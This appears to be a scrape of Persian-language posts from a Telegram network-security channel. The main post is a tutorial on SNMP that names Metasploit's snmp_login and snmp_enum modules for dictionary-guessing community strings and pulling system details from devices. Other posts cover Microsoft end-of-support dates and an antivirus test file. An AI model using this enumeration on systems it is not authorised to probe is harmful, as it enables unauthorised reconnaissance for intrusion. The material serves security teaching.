ما میتونیم از ابزارهای مثل SolarWinds toolset این اطلاعات رو بهصورت گرافیکی ببینیم و خیلی راحت از ابزارها و فایلهای مربوطه روی ویندوز استفاده کنیم.
https://news.1rj.ru/str/ViperNull 🕸
خب مشخصاً SNMP یه پروتکل برای مانیتورینگ شبکهست — Simple Network Management Protocol — یعنی من با فعال کردن این پروتکل روی دیوایسهای شبکه، اطلاعات خیلی جامعی از وضعیت دستگاه میگیرم و میتونم با استفاده از نرمافزارهای مانیتورینگ مثل Zabbix، SolarWinds یا ManageEngine از این پروتکل برای مانیتورینگ شبکه استفاده کنم.
بعضی دستگاهها بهصورت پیشفرض وقتی SNMP روشون فعال میشه، برای دسترسی read-only یا read-write یه community string دارن که معمولاً کلمات «public» یا «private» انتخاب میشه و خب با حدس زدن این رشته (community string) میتونیم اطلاعات رو بیرون بکشیم.
در ویندوزهای خیلی قدیمی مثل XP و Server 2008، پروتکل SNMP بهصورت پیشفرض فعال بود و مایکروسافت بعداً به دلایل امنیتی و کاهش وابستگی، این تنظیمات پیشفرض رو حذف کرد.
SNMP v1 و v2
رمزنگاری ندارن و اگر بستهها رو sniff کنیم بهراحتی community string مشخص میشه، پس بهتره از SNMPv3 استفاده کنید که احراز هویت و رمزنگاری رو اضافه میکنه.
پورتهای مربوط به SNMP:
پورت 161/UDP برای query/polling هست و پورت 162/UDP برای SNMP Trapها.
برای دیدن فعال بودن سرویس SNMP روی ویندوز میتونیم Win + R بزنیم = services.msc و به دنبال SNMP Service بگردیم.
ما یه چیزی به نام SNMP Trap هم داریم که درواقع پیامهای هشدار هست — مثلاً سیستم منتظر میمونه تا پیغام هشدار (مثلاً دان شدن یه لینک) از طرف دستگاه بیاد. SNMP Trap میتونه بهصورت آنی هشدار رو به سرور مانیتورینگ برسونه. درباره حملهای که میشه با این زد در پستهای آینده مفصلتر میگم، ولی یه نمونهاش SNMP Trapهای جعلی برای گیج کردن سرور مانیتورینگ هست.
نحوه بهرهبرداری از این پروتکل برای enumeration:
ما با ابزار Metasploit میتونیم سیستمهایی که SNMP روشون فعاله رو شناسایی کنیم و یه تست دیکشنریاتک روی پسورد این پروتکل بزنیم. روند در متاسپلویت بهطور خلاصه:
وارد مسیر
use auxiliary/scanner/snmp/snmp_login
میشیم و با ست کردن لیست پسورد و رنج آیپی مقصد، run میکنیم (Metasploit یه لیست پیشفرض برای این کار داره و میتونید از اون یا لیستهای خودتون استفاده کنید).
حالا وقتی community string سیستمهایی که SNMP روشون فعاله رو متوجه شدیم، با وارد شدن به مسیر
use auxiliary/scanner/snmp/snmp_enum
میتونیم درخواست دریافت اطلاعات سیستم رو بدیم — مثل وضعیت پروسسها، اطلاعات کارت شبکه، CPU/RAM، سرویسهای فعال، مشخصات سیستم، مشخصات هارد و ... اطلاعات خیلی ارزشمندی که میتونه توی فاز scanning یا فاز بعدی حمله مفید باشه.
ما میتونیم از ابزارهای مثل SolarWinds toolset این اطلاعات رو بهصورت گرافیکی ببینیم و خیلی راحت از ابزارها و فایلهای مربوطه روی ویندوز استفاده کنیم.
https://news.1rj.ru/str/ViperNull 🕸
Telegram
ViperNułł
ViperNull | Exploring the world of network security. Dive into cybersecurity with in-depth content on penetration testing, defensive strategies, vulnerability analysis, and powerful security tools.
Pv ; @Cintaxed
Pv ; @Cintaxed
❤8👍1🔥1
🔴 اکتبر 2025؛ اعلام رسمی پایان پشتیبانی از چندین محصول مایکروسافت
مایکروسافت طبق تقویم اعلامی، در این ماه رسما پشتیبانی از محصولات زیر را متوقف کرده است:
⚫️Windows 10 Enterprise & Education
⚫️Windows 10 Home & Pro
⚫️Office 2016 & 2019
⚫️Exchange Server 2016 & 2019
⚫️Skype for Business Server 2015 & 2019
⚫️Visio / Project 2016 & 2019
⚫️Visual Studio 2015
⚫️Windows Server 2012 / R2
⚫️SQL Server 2014
⚠️ اگر شرکت یا سازمان شما هنوز از یکی از این نسخهها استفاده میکند، لازم است نسبت به ارتقا و یا جایگزینی محصول اقدام کنید. این محصولات از امروز طعمه های جذاب تری برای هکرها هستند ... !!! :)
https://news.1rj.ru/str/ViperNull
مایکروسافت طبق تقویم اعلامی، در این ماه رسما پشتیبانی از محصولات زیر را متوقف کرده است:
⚫️Windows 10 Enterprise & Education
⚫️Windows 10 Home & Pro
⚫️Office 2016 & 2019
⚫️Exchange Server 2016 & 2019
⚫️Skype for Business Server 2015 & 2019
⚫️Visio / Project 2016 & 2019
⚫️Visual Studio 2015
⚫️Windows Server 2012 / R2
⚫️SQL Server 2014
⚠️ اگر شرکت یا سازمان شما هنوز از یکی از این نسخهها استفاده میکند، لازم است نسبت به ارتقا و یا جایگزینی محصول اقدام کنید. این محصولات از امروز طعمه های جذاب تری برای هکرها هستند ... !!! :)
https://news.1rj.ru/str/ViperNull
Telegram
ViperNułł
ViperNull | Exploring the world of network security. Dive into cybersecurity with in-depth content on penetration testing, defensive strategies, vulnerability analysis, and powerful security tools.
Pv ; @Cintaxed
Pv ; @Cintaxed
2❤7
Forwarded from میلاد احمدی
میلاد احمدی
Voice message
Media is too big
VIEW IN TELEGRAM
دیدن این ویدیو باعث تغییر نگرش و دیدگاه شما میشود🧑💻
چرا ویندوز به به نسبت لینوکس بیشتر ویروس میگیرد❓
چرا ویندوز به به نسبت لینوکس بیشتر ویروس میگیرد
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍1
Forwarded from Cyber Sentinel (Sam)
Graph-CTI-annual-report1403.pdf
16.2 MB
گزارش حملات به زیرساخت های ایران از سال 2023 تا 2025
❤5🔥1
Forwarded from Virtualization Channel ((️️*Prometto️*))
اگر میخواید پرزنتی انجام بدید برای آنتی ویروس فایروال یا Endpoint هاتون میتونید از یک ویروس شبیه سازی شده برای اینکار استفاده کنید
اینکار برای پرزنت در جلسه مفیده که نحوه تشخیص ویروس و قرنطینه شدنش رو نشون بدید (برای مدیران جذابه)
ویروس شبیه سازی شده رو میتونید از سایت زیر بردارید
نکته ای که هست اینه که نگران نباشید این ویروس جوری program شده که آسیبی به شبکه یا سازمانتون نمیزنه و صرفا جهت تست طراحی شده
https://support.kaspersky.com/common/diagnostics/7399
@VMware_ESXI
اینکار برای پرزنت در جلسه مفیده که نحوه تشخیص ویروس و قرنطینه شدنش رو نشون بدید (برای مدیران جذابه)
ویروس شبیه سازی شده رو میتونید از سایت زیر بردارید
نکته ای که هست اینه که نگران نباشید این ویروس جوری program شده که آسیبی به شبکه یا سازمانتون نمیزنه و صرفا جهت تست طراحی شده
https://support.kaspersky.com/common/diagnostics/7399
@VMware_ESXI
Kaspersky
EICAR test file for checking Kaspersky applications' behavior
Overview of settings and features available in a Kaspersky application and guides on how to use them.
🙏5❤1🔥1